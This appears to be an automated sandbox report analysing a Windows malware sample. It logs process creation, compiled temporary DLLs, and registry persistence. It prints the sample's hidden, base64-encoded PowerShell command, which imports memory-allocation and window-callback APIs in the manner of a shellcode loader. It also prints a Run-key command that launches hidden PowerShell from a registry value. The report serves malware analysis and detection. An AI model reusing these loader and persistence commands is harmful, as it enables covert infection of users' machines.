FIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0826C51F pushfd ; retn 0008h	3_2_0826C529
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08420A70 push esp; iretd	3_2_08420A71
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0848D070 push eax; mov dword ptr [esp], edx	3_2_0848D084
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08488109 push eax; mov dword ptr [esp], edx	3_2_0848811C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08151140 pushad ; ret	9_2_08151141
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081CE47A pushad ; ret	9_2_081CE499
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_081CE49A pushfd ; ret	9_2_081CE4A9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_082962E0 push C307BDD5h; ret	9_2_0829649B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0898BEE5 pushfd ; retf	9_2_0898BEE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_0898C794 push esp; retf	9_2_0898C795
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_08984FE8 push eax; retf	9_2_08984FE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A4A60 pushfd ; ret	9_2_089A4A70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A4C30 pushfd ; ret	9_2_089A4C40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A8D91 pushfd ; ret	9_2_089A8DA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089AFDC0 pushfd ; ret	9_2_089AFDD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089ABE91 pushfd ; ret	9_2_089ABEA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A9FD1 pushfd ; ret	9_2_089AA000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A3F20 pushfd ; ret	9_2_089A3F30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089ABF40 pushfd ; ret	9_2_089ABF50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089AB1F0 pushfd ; ret	9_2_089AB200
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A3132 pushfd ; ret	9_2_089A3140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A5290 pushfd ; ret	9_2_089A52E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A8332 pushfd ; ret	9_2_089A8360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A5328 pushfd ; ret	9_2_089A52E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089AA430 pushfd ; ret	9_2_089AA440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089AA7D1 pushfd ; ret	9_2_089AA800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089A3738 pushfd ; ret	9_2_089A3740
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089B1E2C push ds; iretd	9_2_089B1E2F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089DA0E1 push es; ret	9_2_089DA070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089DA069 push es; ret	9_2_089DA070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_089D7180 push es; ret	9_2_089D7190

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\uotckr0j.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vybs2gqu.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\mla4kvb3.dll	Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2

Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2 c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden $discommo=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Nydelsesmi;powershell.exe -windowstyle hidden -encodedcommand($discommo)

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deathwe2			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
